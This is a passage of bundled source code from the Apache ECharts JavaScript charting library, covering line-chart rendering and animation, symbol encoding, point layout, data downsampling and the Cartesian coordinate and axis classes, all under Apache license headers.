labelMap[labelItem.tickValue] = 1;\n    });\n\n    return function (dataIndex) {\n        return !labelMap.hasOwnProperty(data.get(categoryDataDim, dataIndex));\n    };\n}\n\nfunction canShowAllSymbolForCategory(categoryAxis, data) {\n    // In mose cases, line is monotonous on category axis, and the label size\n    // is close with each other. So we check the symbol size and some of the\n    // label size alone with the category axis to estimate whether all symbol\n    // can be shown without overlap.\n    var axisExtent = categoryAxis.getExtent();\n    var availSize = Math.abs(axisExtent[1] - axisExtent[0]) / categoryAxis.scale.count();\n    isNaN(availSize) && (availSize = 0); // 0/0 is NaN.\n\n    // Sampling some points, max 5.\n    var dataLen = data.count();\n    var step = Math.max(1, Math.round(dataLen / 5));\n    for (var dataIndex = 0; dataIndex < dataLen; dataIndex += step) {\n        if (SymbolClz$1.getSymbolSize(\n                data, dataIndex\n            // Only for cartesian, where `isHorizontal` exists.\n            )[categoryAxis.isHorizontal() ? 1 : 0]\n            // Empirical number\n            * 1.5 > availSize\n        ) {\n            return false;\n        }\n    }\n\n    return true;\n}\n\nfunction createLineClipPath(coordSys, hasAnimation, seriesModel) {\n    if (coordSys.type === 'cartesian2d') {\n        var isHorizontal = coordSys.getBaseAxis().isHorizontal();\n        var clipPath = createGridClipPath(coordSys, hasAnimation, seriesModel);\n        // Expand clip shape to avoid clipping when line value exceeds axis\n        if (!seriesModel.get('clip', true)) {\n            var rectShape = clipPath.shape;\n            var expandSize = Math.max(rectShape.width, rectShape.height);\n            if (isHorizontal) {\n                rectShape.y -= expandSize;\n                rectShape.height += expandSize * 2;\n            }\n            else {\n                rectShape.x -= expandSize;\n                rectShape.width += expandSize * 2;\n            }\n        }\n        return clipPath;\n    }\n    else {\n        return createPolarClipPath(coordSys, hasAnimation, seriesModel);\n    }\n\n}\n\nChart.extend({\n\n    type: 'line',\n\n    init: function () {\n        var lineGroup = new Group();\n\n        var symbolDraw = new SymbolDraw();\n        this.group.add(symbolDraw.group);\n\n        this._symbolDraw = symbolDraw;\n        this._lineGroup = lineGroup;\n    },\n\n    render: function (seriesModel, ecModel, api) {\n        var coordSys = seriesModel.coordinateSystem;\n        var group = this.group;\n        var data = seriesModel.getData();\n        var lineStyleModel = seriesModel.getModel('lineStyle');\n        var areaStyleModel = seriesModel.getModel('areaStyle');\n\n        var points = data.mapArray(data.getItemLayout);\n\n        var isCoordSysPolar = coordSys.type === 'polar';\n        var prevCoordSys = this._coordSys;\n\n        var symbolDraw = this._symbolDraw;\n        var polyline = this._polyline;\n        var polygon = this._polygon;\n\n        var lineGroup = this._lineGroup;\n\n        var hasAnimation = seriesModel.get('animation');\n\n        var isAreaChart = !areaStyleModel.isEmpty();\n\n        var valueOrigin = areaStyleModel.get('origin');\n        var dataCoordInfo = prepareDataCoordInfo(coordSys, data, valueOrigin);\n\n        var stackedOnPoints = getStackedOnPoints(coordSys, data, dataCoordInfo);\n\n        var showSymbol = seriesModel.get('showSymbol');\n\n        var isIgnoreFunc = showSymbol && !isCoordSysPolar\n            && getIsIgnoreFunc(seriesModel, data, coordSys);\n\n        // Remove temporary symbols\n        var oldData = this._data;\n        oldData && oldData.eachItemGraphicEl(function (el, idx) {\n            if (el.__temp) {\n                group.remove(el);\n                oldData.setItemGraphicEl(idx, null);\n            }\n        });\n\n        // Remove previous created symbols if showSymbol changed to false\n        if (!showSymbol) {\n            symbolDraw.remove();\n        }\n\n        group.add(lineGroup);\n\n        // FIXME step not support polar\n        var step = !isCoordSysPolar && seriesModel.get('step');\n        var clipShapeForSymbol;\n        if (coordSys && coordSys.getArea && seriesModel.get('clip', true)) {\n            clipShapeForSymbol = coordSys.getArea();\n            // Avoid float number rounding error for symbol on the edge of axis extent.\n            // See #7913 and `test/dataZoom-clip.html`.\n            if (clipShapeForSymbol.width != null) {\n                clipShapeForSymbol.x -= 0.1;\n                clipShapeForSymbol.y -= 0.1;\n                clipShapeForSymbol.width += 0.2;\n                clipShapeForSymbol.height += 0.2;\n            }\n            else if (clipShapeForSymbol.r0) {\n                clipShapeForSymbol.r0 -= 0.5;\n                clipShapeForSymbol.r1 += 0.5;\n            }\n        }\n        this._clipShapeForSymbol = clipShapeForSymbol;\n        // Initialization animation or coordinate system changed\n        if (\n            !(polyline && prevCoordSys.type === coordSys.type && step === this._step)\n        ) {\n            showSymbol && symbolDraw.updateData(data, {\n                isIgnore: isIgnoreFunc,\n                clipShape: clipShapeForSymbol\n            });\n\n            if (step) {\n                // TODO If stacked series is not step\n                points = turnPointsIntoStep(points, coordSys, step);\n                stackedOnPoints = turnPointsIntoStep(stackedOnPoints, coordSys, step);\n            }\n\n            polyline = this._newPolyline(points, coordSys, hasAnimation);\n            if (isAreaChart) {\n                polygon = this._newPolygon(\n                    points, stackedOnPoints,\n                    coordSys, hasAnimation\n                );\n            }\n            lineGroup.setClipPath(createLineClipPath(coordSys, true, seriesModel));\n        }\n        else {\n            if (isAreaChart && !polygon) {\n                // If areaStyle is added\n                polygon = this._newPolygon(\n                    points, stackedOnPoints,\n                    coordSys, hasAnimation\n                );\n            }\n            else if (polygon && !isAreaChart) {\n                // If areaStyle is removed\n                lineGroup.remove(polygon);\n                polygon = this._polygon = null;\n            }\n\n            // Update clipPath\n            lineGroup.setClipPath(createLineClipPath(coordSys, false, seriesModel));\n\n            // Always update, or it is wrong in the case turning on legend\n            // because points are not changed\n            showSymbol && symbolDraw.updateData(data, {\n                isIgnore: isIgnoreFunc,\n                clipShape: clipShapeForSymbol\n            });\n\n            // Stop symbol animation and sync with line points\n            // FIXME performance?\n            data.eachItemGraphicEl(function (el) {\n                el.stopAnimation(true);\n            });\n\n            // In the case data zoom triggerred refreshing frequently\n            // Data may not change if line has a category axis. So it should animate nothing\n            if (!isPointsSame(this._stackedOnPoints, stackedOnPoints)\n                || !isPointsSame(this._points, points)\n            ) {\n                if (hasAnimation) {\n                    this._updateAnimation(\n                        data, stackedOnPoints, coordSys, api, step, valueOrigin\n                    );\n                }\n                else {\n                    // Not do it in update with animation\n                    if (step) {\n                        // TODO If stacked series is not step\n                        points = turnPointsIntoStep(points, coordSys, step);\n                        stackedOnPoints = turnPointsIntoStep(stackedOnPoints, coordSys, step);\n                    }\n\n                    polyline.setShape({\n                        points: points\n                    });\n                    polygon && polygon.setShape({\n                        points: points,\n                        stackedOnPoints: stackedOnPoints\n                    });\n                }\n            }\n        }\n\n        var visualColor = getVisualGradient(data, coordSys) || data.getVisual('color');\n\n        polyline.useStyle(defaults(\n            // Use color in lineStyle first\n            lineStyleModel.getLineStyle(),\n            {\n                fill: 'none',\n                stroke: visualColor,\n                lineJoin: 'bevel'\n            }\n        ));\n\n        var smooth = seriesModel.get('smooth');\n        smooth = getSmooth(seriesModel.get('smooth'));\n        polyline.setShape({\n            smooth: smooth,\n            smoothMonotone: seriesModel.get('smoothMonotone'),\n            connectNulls: seriesModel.get('connectNulls')\n        });\n\n        if (polygon) {\n            var stackedOnSeries = data.getCalculationInfo('stackedOnSeries');\n            var stackedOnSmooth = 0;\n\n            polygon.useStyle(defaults(\n                areaStyleModel.getAreaStyle(),\n                {\n                    fill: visualColor,\n                    opacity: 0.7,\n                    lineJoin: 'bevel'\n                }\n            ));\n\n            if (stackedOnSeries) {\n                stackedOnSmooth = getSmooth(stackedOnSeries.get('smooth'));\n            }\n\n            polygon.setShape({\n                smooth: smooth,\n                stackedOnSmooth: stackedOnSmooth,\n                smoothMonotone: seriesModel.get('smoothMonotone'),\n                connectNulls: seriesModel.get('connectNulls')\n            });\n        }\n\n        this._data = data;\n        // Save the coordinate system for transition animation when data changed\n        this._coordSys = coordSys;\n        this._stackedOnPoints = stackedOnPoints;\n        this._points = points;\n        this._step = step;\n        this._valueOrigin = valueOrigin;\n    },\n\n    dispose: function () {},\n\n    highlight: function (seriesModel, ecModel, api, payload) {\n        var data = seriesModel.getData();\n        var dataIndex = queryDataIndex(data, payload);\n\n        if (!(dataIndex instanceof Array) && dataIndex != null && dataIndex >= 0) {\n            var symbol = data.getItemGraphicEl(dataIndex);\n            if (!symbol) {\n                // Create a temporary symbol if it is not exists\n                var pt = data.getItemLayout(dataIndex);\n                if (!pt) {\n                    // Null data\n                    return;\n                }\n                // fix #11360: should't draw symbol outside clipShapeForSymbol\n                if (this._clipShapeForSymbol && !this._clipShapeForSymbol.contain(pt[0], pt[1])) {\n                    return;\n                }\n                symbol = new SymbolClz$1(data, dataIndex);\n                symbol.position = pt;\n                symbol.setZ(\n                    seriesModel.get('zlevel'),\n                    seriesModel.get('z')\n                );\n                symbol.ignore = isNaN(pt[0]) || isNaN(pt[1]);\n                symbol.__temp = true;\n                data.setItemGraphicEl(dataIndex, symbol);\n\n                // Stop scale animation\n                symbol.stopSymbolAnimation(true);\n\n                this.group.add(symbol);\n            }\n            symbol.highlight();\n        }\n        else {\n            // Highlight whole series\n            Chart.prototype.highlight.call(\n                this, seriesModel, ecModel, api, payload\n            );\n        }\n    },\n\n    downplay: function (seriesModel, ecModel, api, payload) {\n        var data = seriesModel.getData();\n        var dataIndex = queryDataIndex(data, payload);\n        if (dataIndex != null && dataIndex >= 0) {\n            var symbol = data.getItemGraphicEl(dataIndex);\n            if (symbol) {\n                if (symbol.__temp) {\n                    data.setItemGraphicEl(dataIndex, null);\n                    this.group.remove(symbol);\n                }\n                else {\n                    symbol.downplay();\n                }\n            }\n        }\n        else {\n            // FIXME\n            // can not downplay completely.\n            // Downplay whole series\n            Chart.prototype.downplay.call(\n                this, seriesModel, ecModel, api, payload\n            );\n        }\n    },\n\n    /**\n     * @param {module:zrender/container/Group} group\n     * @param {Array.<Array.<number>>} points\n     * @private\n     */\n    _newPolyline: function (points) {\n        var polyline = this._polyline;\n        // Remove previous created polyline\n        if (polyline) {\n            this._lineGroup.remove(polyline);\n        }\n\n        polyline = new Polyline$1({\n            shape: {\n                points: points\n            },\n            silent: true,\n            z2: 10\n        });\n\n        this._lineGroup.add(polyline);\n\n        this._polyline = polyline;\n\n        return polyline;\n    },\n\n    /**\n     * @param {module:zrender/container/Group} group\n     * @param {Array.<Array.<number>>} stackedOnPoints\n     * @param {Array.<Array.<number>>} points\n     * @private\n     */\n    _newPolygon: function (points, stackedOnPoints) {\n        var polygon = this._polygon;\n        // Remove previous created polygon\n        if (polygon) {\n            this._lineGroup.remove(polygon);\n        }\n\n        polygon = new Polygon$1({\n            shape: {\n                points: points,\n                stackedOnPoints: stackedOnPoints\n            },\n            silent: true\n        });\n\n        this._lineGroup.add(polygon);\n\n        this._polygon = polygon;\n        return polygon;\n    },\n\n    /**\n     * @private\n     */\n    // FIXME Two value axis\n    _updateAnimation: function (data, stackedOnPoints, coordSys, api, step, valueOrigin) {\n        var polyline = this._polyline;\n        var polygon = this._polygon;\n        var seriesModel = data.hostModel;\n\n        var diff = lineAnimationDiff(\n            this._data, data,\n            this._stackedOnPoints, stackedOnPoints,\n            this._coordSys, coordSys,\n            this._valueOrigin, valueOrigin\n        );\n\n        var current = diff.current;\n        var stackedOnCurrent = diff.stackedOnCurrent;\n        var next = diff.next;\n        var stackedOnNext = diff.stackedOnNext;\n        if (step) {\n            // TODO If stacked series is not step\n            current = turnPointsIntoStep(diff.current, coordSys, step);\n            stackedOnCurrent = turnPointsIntoStep(diff.stackedOnCurrent, coordSys, step);\n            next = turnPointsIntoStep(diff.next, coordSys, step);\n            stackedOnNext = turnPointsIntoStep(diff.stackedOnNext, coordSys, step);\n        }\n        // `diff.current` is subset of `current` (which should be ensured by\n        // turnPointsIntoStep), so points in `__points` can be updated when\n        // points in `current` are update during animation.\n        polyline.shape.__points = diff.current;\n        polyline.shape.points = current;\n\n        updateProps(polyline, {\n            shape: {\n                points: next\n            }\n        }, seriesModel);\n\n        if (polygon) {\n            polygon.setShape({\n                points: current,\n                stackedOnPoints: stackedOnCurrent\n            });\n            updateProps(polygon, {\n                shape: {\n                    points: next,\n                    stackedOnPoints: stackedOnNext\n                }\n            }, seriesModel);\n        }\n\n        var updatedDataInfo = [];\n        var diffStatus = diff.status;\n\n        for (var i = 0; i < diffStatus.length; i++) {\n            var cmd = diffStatus[i].cmd;\n            if (cmd === '=') {\n                var el = data.getItemGraphicEl(diffStatus[i].idx1);\n                if (el) {\n                    updatedDataInfo.push({\n                        el: el,\n                        ptIdx: i    // Index of points\n                    });\n                }\n            }\n        }\n\n        if (polyline.animators && polyline.animators.length) {\n            polyline.animators[0].during(function () {\n                for (var i = 0; i < updatedDataInfo.length; i++) {\n                    var el = updatedDataInfo[i].el;\n                    el.attr('position', polyline.shape.__points[updatedDataInfo[i].ptIdx]);\n                }\n            });\n        }\n    },\n\n    remove: function (ecModel) {\n        var group = this.group;\n        var oldData = this._data;\n        this._lineGroup.removeAll();\n        this._symbolDraw.remove(true);\n        // Remove temporary created elements when highlighting\n        oldData && oldData.eachItemGraphicEl(function (el, idx) {\n            if (el.__temp) {\n                group.remove(el);\n                oldData.setItemGraphicEl(idx, null);\n            }\n        });\n\n        this._polyline =\n            this._polygon =\n            this._coordSys =\n            this._points =\n            this._stackedOnPoints =\n            this._data = null;\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar visualSymbol = function (seriesType, defaultSymbolType, legendSymbol) {\n    // Encoding visual for all series include which is filtered for legend drawing\n    return {\n        seriesType: seriesType,\n\n        // For legend.\n        performRawSeries: true,\n\n        reset: function (seriesModel, ecModel, api) {\n            var data = seriesModel.getData();\n\n            var symbolType = seriesModel.get('symbol');\n            var symbolSize = seriesModel.get('symbolSize');\n            var keepAspect = seriesModel.get('symbolKeepAspect');\n\n            var hasSymbolTypeCallback = isFunction$1(symbolType);\n            var hasSymbolSizeCallback = isFunction$1(symbolSize);\n            var hasCallback = hasSymbolTypeCallback || hasSymbolSizeCallback;\n            var seriesSymbol = (!hasSymbolTypeCallback && symbolType) ? symbolType : defaultSymbolType;\n            var seriesSymbolSize = !hasSymbolSizeCallback ? symbolSize : null;\n\n            data.setVisual({\n                legendSymbol: legendSymbol || seriesSymbol,\n                // If seting callback functions on `symbol` or `symbolSize`, for simplicity and avoiding\n                // to bring trouble, we do not pick a reuslt from one of its calling on data item here,\n                // but just use the default value. Callback on `symbol` or `symbolSize` is convenient in\n                // some cases but generally it is not recommanded.\n                symbol: seriesSymbol,\n                symbolSize: seriesSymbolSize,\n                symbolKeepAspect: keepAspect\n            });\n\n            // Only visible series has each data be visual encoded\n            if (ecModel.isSeriesFiltered(seriesModel)) {\n                return;\n            }\n\n            function dataEach(data, idx) {\n                if (hasCallback) {\n                    var rawValue = seriesModel.getRawValue(idx);\n                    var params = seriesModel.getDataParams(idx);\n                    hasSymbolTypeCallback && data.setItemVisual(idx, 'symbol', symbolType(rawValue, params));\n                    hasSymbolSizeCallback && data.setItemVisual(idx, 'symbolSize', symbolSize(rawValue, params));\n                }\n\n                if (data.hasItemOption) {\n                    var itemModel = data.getItemModel(idx);\n                    var itemSymbolType = itemModel.getShallow('symbol', true);\n                    var itemSymbolSize = itemModel.getShallow('symbolSize', true);\n                    var itemSymbolKeepAspect = itemModel.getShallow('symbolKeepAspect', true);\n\n                    // If has item symbol\n                    if (itemSymbolType != null) {\n                        data.setItemVisual(idx, 'symbol', itemSymbolType);\n                    }\n                    if (itemSymbolSize != null) {\n                        // PENDING Transform symbolSize ?\n                        data.setItemVisual(idx, 'symbolSize', itemSymbolSize);\n                    }\n                    if (itemSymbolKeepAspect != null) {\n                        data.setItemVisual(idx, 'symbolKeepAspect', itemSymbolKeepAspect);\n                    }\n                }\n            }\n\n            return { dataEach: (data.hasItemOption || hasCallback) ? dataEach : null };\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Float32Array */\n\nvar pointsLayout = function (seriesType) {\n    return {\n        seriesType: seriesType,\n\n        plan: createRenderPlanner(),\n\n        reset: function (seriesModel) {\n            var data = seriesModel.getData();\n            var coordSys = seriesModel.coordinateSystem;\n            var pipelineContext = seriesModel.pipelineContext;\n            var isLargeRender = pipelineContext.large;\n\n            if (!coordSys) {\n                return;\n            }\n\n            var dims = map(coordSys.dimensions, function (dim) {\n                return data.mapDimension(dim);\n            }).slice(0, 2);\n            var dimLen = dims.length;\n\n            var stackResultDim = data.getCalculationInfo('stackResultDimension');\n            if (isDimensionStacked(data, dims[0] /*, dims[1]*/)) {\n                dims[0] = stackResultDim;\n            }\n            if (isDimensionStacked(data, dims[1] /*, dims[0]*/)) {\n                dims[1] = stackResultDim;\n            }\n\n            function progress(params, data) {\n                var segCount = params.end - params.start;\n                var points = isLargeRender && new Float32Array(segCount * dimLen);\n\n                for (var i = params.start, offset = 0, tmpIn = [], tmpOut = []; i < params.end; i++) {\n                    var point;\n\n                    if (dimLen === 1) {\n                        var x = data.get(dims[0], i);\n                        point = !isNaN(x) && coordSys.dataToPoint(x, null, tmpOut);\n                    }\n                    else {\n                        var x = tmpIn[0] = data.get(dims[0], i);\n                        var y = tmpIn[1] = data.get(dims[1], i);\n                        // Also {Array.<number>}, not undefined to avoid if...else... statement\n                        point = !isNaN(x) && !isNaN(y) && coordSys.dataToPoint(tmpIn, null, tmpOut);\n                    }\n\n                    if (isLargeRender) {\n                        points[offset++] = point ? point[0] : NaN;\n                        points[offset++] = point ? point[1] : NaN;\n                    }\n                    else {\n                        data.setItemLayout(i, (point && point.slice()) || [NaN, NaN]);\n                    }\n                }\n\n                isLargeRender && data.setLayout('symbolPoints', points);\n            }\n\n            return dimLen && {progress: progress};\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar samplers = {\n    average: function (frame) {\n        var sum = 0;\n        var count = 0;\n        for (var i = 0; i < frame.length; i++) {\n            if (!isNaN(frame[i])) {\n                sum += frame[i];\n                count++;\n            }\n        }\n        // Return NaN if count is 0\n        return count === 0 ? NaN : sum / count;\n    },\n    sum: function (frame) {\n        var sum = 0;\n        for (var i = 0; i < frame.length; i++) {\n            // Ignore NaN\n            sum += frame[i] || 0;\n        }\n        return sum;\n    },\n    max: function (frame) {\n        var max = -Infinity;\n        for (var i = 0; i < frame.length; i++) {\n            frame[i] > max && (max = frame[i]);\n        }\n        // NaN will cause illegal axis extent.\n        return isFinite(max) ? max : NaN;\n    },\n    min: function (frame) {\n        var min = Infinity;\n        for (var i = 0; i < frame.length; i++) {\n            frame[i] < min && (min = frame[i]);\n        }\n        // NaN will cause illegal axis extent.\n        return isFinite(min) ? min : NaN;\n    },\n    // TODO\n    // Median\n    nearest: function (frame) {\n        return frame[0];\n    }\n};\n\nvar indexSampler = function (frame, value) {\n    return Math.round(frame.length / 2);\n};\n\nvar dataSample = function (seriesType) {\n    return {\n\n        seriesType: seriesType,\n\n        modifyOutputEnd: true,\n\n        reset: function (seriesModel, ecModel, api) {\n            var data = seriesModel.getData();\n            var sampling = seriesModel.get('sampling');\n            var coordSys = seriesModel.coordinateSystem;\n            // Only cartesian2d support down sampling\n            if (coordSys.type === 'cartesian2d' && sampling) {\n                var baseAxis = coordSys.getBaseAxis();\n                var valueAxis = coordSys.getOtherAxis(baseAxis);\n                var extent = baseAxis.getExtent();\n                // Coordinste system has been resized\n                var size = extent[1] - extent[0];\n                var rate = Math.round(data.count() / size);\n                if (rate > 1) {\n                    var sampler;\n                    if (typeof sampling === 'string') {\n                        sampler = samplers[sampling];\n                    }\n                    else if (typeof sampling === 'function') {\n                        sampler = sampling;\n                    }\n                    if (sampler) {\n                        // Only support sample the first dim mapped from value axis.\n                        seriesModel.setData(data.downSample(\n                            data.mapDimension(valueAxis.dim), 1 / rate, sampler, indexSampler\n                        ));\n                    }\n                }\n            }\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Cartesian coordinate system\n * @module  echarts/coord/Cartesian\n *\n */\n\nfunction dimAxisMapper(dim) {\n    return this._axes[dim];\n}\n\n/**\n * @alias module:echarts/coord/Cartesian\n * @constructor\n */\nvar Cartesian = function (name) {\n    this._axes = {};\n\n    this._dimList = [];\n\n    /**\n     * @type {string}\n     */\n    this.name = name || '';\n};\n\nCartesian.prototype = {\n\n    constructor: Cartesian,\n\n    type: 'cartesian',\n\n    /**\n     * Get axis\n     * @param  {number|string} dim\n     * @return {module:echarts/coord/Cartesian~Axis}\n     */\n    getAxis: function (dim) {\n        return this._axes[dim];\n    },\n\n    /**\n     * Get axes list\n     * @return {Array.<module:echarts/coord/Cartesian~Axis>}\n     */\n    getAxes: function () {\n        return map(this._dimList, dimAxisMapper, this);\n    },\n\n    /**\n     * Get axes list by given scale type\n     */\n    getAxesByScale: function (scaleType) {\n        scaleType = scaleType.toLowerCase();\n        return filter(\n            this.getAxes(),\n            function (axis) {\n                return axis.scale.type === scaleType;\n            }\n        );\n    },\n\n    /**\n     * Add axis\n     * @param {module:echarts/coord/Cartesian.Axis}\n     */\n    addAxis: function (axis) {\n        var dim = axis.dim;\n\n        this._axes[dim] = axis;\n\n        this._dimList.push(dim);\n    },\n\n    /**\n     * Convert data to coord in nd space\n     * @param {Array.<number>|Object.<string, number>} val\n     * @return {Array.<number>|Object.<string, number>}\n     */\n    dataToCoord: function (val) {\n        return this._dataCoordConvert(val, 'dataToCoord');\n    },\n\n    /**\n     * Convert coord in nd space to data\n     * @param  {Array.<number>|Object.<string, number>} val\n     * @return {Array.<number>|Object.<string, number>}\n     */\n    coordToData: function (val) {\n        return this._dataCoordConvert(val, 'coordToData');\n    },\n\n    _dataCoordConvert: function (input, method) {\n        var dimList = this._dimList;\n\n        var output = input instanceof Array ? [] : {};\n\n        for (var i = 0; i < dimList.length; i++) {\n            var dim = dimList[i];\n            var axis = this._axes[dim];\n\n            output[dim] = axis[method](input[dim]);\n        }\n\n        return output;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nfunction Cartesian2D(name) {\n\n    Cartesian.call(this, name);\n}\n\nCartesian2D.prototype = {\n\n    constructor: Cartesian2D,\n\n    type: 'cartesian2d',\n\n    /**\n     * @type {Array.<string>}\n     * @readOnly\n     */\n    dimensions: ['x', 'y'],\n\n    /**\n     * Base axis will be used on stacking.\n     *\n     * @return {module:echarts/coord/cartesian/Axis2D}\n     */\n    getBaseAxis: function () {\n        return this.getAxesByScale('ordinal')[0]\n            || this.getAxesByScale('time')[0]\n            || this.getAxis('x');\n    },\n\n    /**\n     * If contain point\n     * @param {Array.<number>} point\n     * @return {boolean}\n     */\n    containPoint: function (point) {\n        var axisX = this.getAxis('x');\n        var axisY = this.getAxis('y');\n        return axisX.contain(axisX.toLocalCoord(point[0]))\n            && axisY.contain(axisY.toLocalCoord(point[1]));\n    },\n\n    /**\n     * If contain data\n     * @param {Array.<number>} data\n     * @return {boolean}\n     */\n    containData: function (data) {\n        return this.getAxis('x').containData(data[0])\n            && this.getAxis('y').containData(data[1]);\n    },\n\n    /**\n     * @param {Array.<number>} data\n     * @param {Array.<number>} out\n     * @return {Array.<number>}\n     */\n    dataToPoint: function (data, reserved, out) {\n        var xAxis = this.getAxis('x');\n        var yAxis = this.getAxis('y');\n        out = out || [];\n        out[0] = xAxis.toGlobalCoord(xAxis.dataToCoord(data[0]));\n        out[1] = yAxis.toGlobalCoord(yAxis.dataToCoord(data[1]));\n        return out;\n    },\n\n    /**\n     * @param {Array.<number>} data\n     * @param {Array.<number>} out\n     * @return {Array.<number>}\n     */\n    clampData: function (data, out) {\n        var xScale = this.getAxis('x').scale;\n        var yScale = this.getAxis('y').scale;\n        var xAxisExtent = xScale.getExtent();\n        var yAxisExtent = yScale.getExtent();\n        var x = xScale.parse(data[0]);\n        var y = yScale.parse(data[1]);\n        out = out || [];\n        out[0] = Math.min(\n            Math.max(Math.min(xAxisExtent[0], xAxisExtent[1]), x),\n            Math.max(xAxisExtent[0], xAxisExtent[1])\n        );\n        out[1] = Math.min(\n            Math.max(Math.min(yAxisExtent[0], yAxisExtent[1]), y),\n            Math.max(yAxisExtent[0], yAxisExtent[1])\n        );\n\n        return out;\n    },\n\n    /**\n     * @param {Array.<number>} point\n     * @param {Array.<number>} out\n     * @return {Array.<number>}\n     */\n    pointToData: function (point, out) {\n        var xAxis = this.getAxis('x');\n        var yAxis = this.getAxis('y');\n        out = out || [];\n        out[0] = xAxis.coordToData(xAxis.toLocalCoord(point[0]));\n        out[1] = yAxis.coordToData(yAxis.toLocalCoord(point[1]));\n        return out;\n    },\n\n    /**\n     * Get other axis\n     * @param {module:echarts/coord/cartesian/Axis2D} axis\n     */\n    getOtherAxis: function (axis) {\n        return this.getAxis(axis.dim === 'x' ? 'y' : 'x');\n    },\n\n    /**\n     * Get rect area of cartesian.\n     * Area will have a contain function to determine if a point is in the coordinate system.\n     * @return {BoundingRect}\n     */\n    getArea: function () {\n        var xExtent = this.getAxis('x').getGlobalExtent();\n        var yExtent = this.getAxis('y').getGlobalExtent();\n        var x = Math.min(xExtent[0], xExtent[1]);\n        var y = Math.min(yExtent[0], yExtent[1]);\n        var width = Math.max(xExtent[0], xExtent[1]) - x;\n        var height = Math.max(yExtent[0], yExtent[1]) - y;\n\n        var rect = new BoundingRect(x, y, width, height);\n        return rect;\n    }\n\n};\n\ninherits(Cartesian2D, Cartesian);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Extend axis 2d\n * @constructor module:echarts/coord/cartesian/Axis2D\n * @extends {module:echarts/coord/cartesian/Axis}\n * @param {string} dim\n * @param {*} scale\n * @param {Array.<number>} coordExtent\n * @param {string} axisType\n * @param {string} position\n */\nvar Axis2D = function (dim, scale, coordExtent, axisType, position) {\n    Axis.call(this, dim, scale, coordExtent);\n    /**\n     * Axis type\n     *  - 'category'\n     *  - 'value'\n     *  - 'time'\n     *  - 'log'\n     * @type {string}\n     */\n    this.type = axisType || 'value';\n\n    /**\n     * Axis position\n     *  - 'top'\n     *  - 'bottom'\n     *  - 'left'\n     *  - 'right'\n     */\n    this.position = position || 'bottom';\n};\n\nAxis2D.prototype = {\n\n    constructor: Axis2D,\n\n    /**\n     * Index of axis, can be used as key\n     */\n    index: 0,\n\n    /**\n     * Implemented in <module:echarts/coord/cartesian/Grid>.\n     * @return {Array.<module:echarts/coord/cartesian/Axis2D>}\n     *         If not on zero of other axis, return null/undefined.\n     *         If no axes, return an empty array.\n     */\n    getAxesOnZeroOf: null,\n\n    /**\n     * Axis model\n     * @param {module:echarts/coord/cartesian/AxisModel}\n     */\n    model: null,\n\n    isHorizontal: function () {\n        var position = this.position;\n        return position === 'top' || position === 'bottom';\n    },\n\n    /**\n     * Each item cooresponds 